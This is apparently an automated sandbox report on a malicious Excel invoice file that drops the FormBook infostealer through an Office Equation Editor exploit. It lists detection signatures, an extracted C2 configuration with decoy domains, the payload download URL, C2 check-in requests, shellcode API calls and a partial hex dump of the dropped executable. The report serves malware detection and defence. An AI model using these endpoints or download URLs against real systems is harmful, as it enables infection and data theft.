Windows Analysis Report
DL03327INV.xlsx

Overview

General Information

Sample Name:	DL03327INV.xlsx
Analysis ID:	626601
MD5:	5b4a67ac532a5d8900b815144f0fb845
SHA1:	6da306004e084780e9f57f3702a5ec22e72fff6c
SHA256:	98fc7157dafde651c3ab515663e3a91f034b49175e2e2495c00576c4b8e9e96d
Tags:	VelvetSweatshopxlsx
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Injects a PE file into a foreign processes

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Shellcode detected

Office equation editor drops PE file

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Office equation editor establishes network connection

Drops PE files to the user root directory

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Potential document exploit detected (unknown TCP traffic)

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Contains functionality to download and execute PE files

Office Equation Editor has been started

Contains functionality to download and launch executables

Checks if the current process is being debugged

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Signatures

AV Detection

Found malware configuration

Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.arjimni.com/nc39/"], "decoy": ["bohicaapparel.com", "chilliesofwoodstock.com", "szcipa.com", "nirmalaswagruhafoods.com", "orbitas.online", "bjvxx.com", "atomvpn.site", "thecanvacoach.com", "thewhitelounge.com", "trwebz.xyz", "yiwanggkm.com", "maggiceden-io.com", "kimyanindelisi.online", "xn--e02b19uo0j.com", "kaola74.top", "klcsales.net", "renacerdevteam.com", "talkmoor.com", "seobusinesslistings.com", "contractornurd.com", "wolksquit.com", "hamiltonspringfield.com", "skinclash.com", "d-web.net", "tige03.xyz", "thereeldecoy.com", "dutyapparel.com", "vicentedotorarquitectos.com", "bensdrywall.com", "domainnetwoks.com", "incorrectbenevolence.com", "ramvadher.space", "dbluvt.xyz", "laps-clicks.com", "thewattelectric.com", "fogpromo.com", "ibcfitting.com", "get25000today.com", "do-hobbies-indoors.com", "marmagdistribuciones.com", "newworldtongpaihotels.net", "3astratford.com", "tocarrythemessage.com", "57shasha.club", "117colgett.com", "captainnoclue.com", "rapejesus.site", "grandas-svoboda.com", "apartmentpermis.com", "greatco.biz", "joneswoodworks.com", "lilatoons.com", "banalto.com", "caycilargida.online", "gangez.com", "tw-life.net", "treasuresofjudaica.com", "monin.one", "earthdefense.global", "troolygood.com", "eafc.tech", "southcarolinawire.xyz", "designstatussupport.com", "moorblaque.com"]}

Multi AV Scanner detection for submitted file

Source: DL03327INV.xlsx	Virustotal: Detection: 38%			Perma Link
Source: DL03327INV.xlsx	ReversingLabs: Detection: 26%

Yara detected FormBook

Source: Yara match	File source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: www.arjimni.com/nc39/	Avira URL Cloud: Label: malware
Source: http://www.arjimni.com/nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwh	Avira URL Cloud: Label: malware
Source: http://104.168.33.31/75/vbc.exe	Avira URL Cloud: Label: malware
Source: http://www.contractornurd.com/nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 51%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 51%

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 6.2.yldnat.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.yldnat.exe.120000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.3.EQNEDT32.EXE.6af7ba.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 6.0.yldnat.exe.400000.9.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.yldnat.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.yldnat.exe.400000.7.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 104.168.33.31 Port: 80

Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\zjary\jjvucn\mxni\b98fa234680046ddacdf27145f9ff7b1\qjcbwv\ygyntjah\Release\ygyntjah.pdb source: vbc.exe, 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp, yldnat.exe, 00000005.00000000.976220140.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, yldnat.exe, 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, yldnat.exe, 00000006.00000000.982290199.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, wuapp.exe, 00000008.00000002.1176125071.0000000002397000.00000004.10000000.00040000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175572763.0000000000352000.00000004.00000020.00020000.00000000.sdmp, nss8A2D.tmp.4.dr, yldnat.exe.4.dr
Source:	Binary string: wntdll.pdb source: yldnat.exe, yldnat.exe, 00000006.00000003.985070971.00000000006C0000.00000004.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032618043.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000003.983271572.0000000000560000.00000004.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, wuapp.exe, 00000008.00000003.1032134115.0000000000780000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175921231.0000000002010000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.1033412733.0000000001D00000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wuapp.pdb source: yldnat.exe, 00000006.00000002.1031989955.0000000000030000.00000040.10000000.00040000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032320172.0000000000484000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405D7A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004069A4 FindFirstFileW,FindClose,	4_2_004069A4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Software Vulnerabilities

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D04FF URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_036D04FF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D052D ShellExecuteW,ExitProcess,	2_2_036D052D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D0494 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_036D0494
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D03EF ExitProcess,	2_2_036D03EF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D0552 ExitProcess,	2_2_036D0552
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D04AE URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_036D04AE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D0424 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_036D0424
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D0408 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_036D0408
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D0518 ShellExecuteW,ExitProcess,	2_2_036D0518

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: www.arjimni.com

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 104.168.33.31:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 104.168.33.31:80

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 23.81.214.26 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.arjimni.com
Source: C:\Windows\explorer.exe	Domain query: www.tw-life.net
Source: C:\Windows\explorer.exe	Domain query: www.contractornurd.com
Source: C:\Windows\explorer.exe	Domain query: www.yiwanggkm.com
Source: C:\Windows\explorer.exe	Network Connect: 164.155.217.57 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.212 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49175 -> 198.54.117.212:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49175 -> 198.54.117.212:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49175 -> 198.54.117.212:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.arjimni.com/nc39/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: LEASEWEB-USA-SEA-10US LEASEWEB-USA-SEA-10US

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwh HTTP/1.1Host: www.arjimni.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh HTTP/1.1Host: www.contractornurd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nc39/?dZzp=Td3Z6WACWlvn2oxJ5kz3cAAvTYM+vx9a0mv4ko18Io/mhbtUurGZKYFJi0A4+N8FDsGh8g==&3f=j6AdrVwh HTTP/1.1Host: www.tw-life.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nc39/?dZzp=SW2DOu4AoD1tt2PaEEhiNvSk2qD2OpQeAcSR0NEUE8SsNGniN/+F24NqGXKX7Cj1ljS/6Q==&3f=j6AdrVwh HTTP/1.1Host: www.yiwanggkm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 198.54.117.212 198.54.117.212

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 May 2022 13:19:31 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29Last-Modified: Fri, 13 May 2022 09:36:08 GMTETag: "4065c-5dee1677234a5"Accept-Ranges: bytesContent-Length: 263772Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 46 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 90 3b 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 67 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 0a 00 00 00 90 3b 00 00 0c 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /75/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.33.31Connection: Keep-Alive

Contains functionality to download and execute PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_036D04FF URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_036D04FF

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sat, 14 May 2022 13:20:49 GMTContent-Type: text/htmlContent-Length: 291ETag: "627e7264-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 May 2022 13:21:05 GMTContent-Type: text/htmlContent-Length: 466Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 d2 b3 c3 e6 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 71 71 2e 63 6f 6d 2f 34 30 34 2f 73 65 61 72 63 68 5f 63 68 69 6c 64 72 65 6e 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a c4 e3 b7 c3 ce ca b5 c4 d2 b3 c3 e6 b2 bb b4 e6 d4 da a1 a3 a1 a3 a1 a3 a1 a3 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e b7 b5 bb d8 d6 f7 d2 b3 3c 2f 61 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>404</title></head><body><script type="text/javascript" src="http://www.qq.com/404/search_children.js" charset="utf-8"></script> <a href="/"></a></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31

Source: EQNEDT32.EXE, 00000002.00000002.971169653.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comI equals www.linkedin.com (Linkedin)
Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: EQNEDT32.EXE, 00000002.00000002.971169653.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

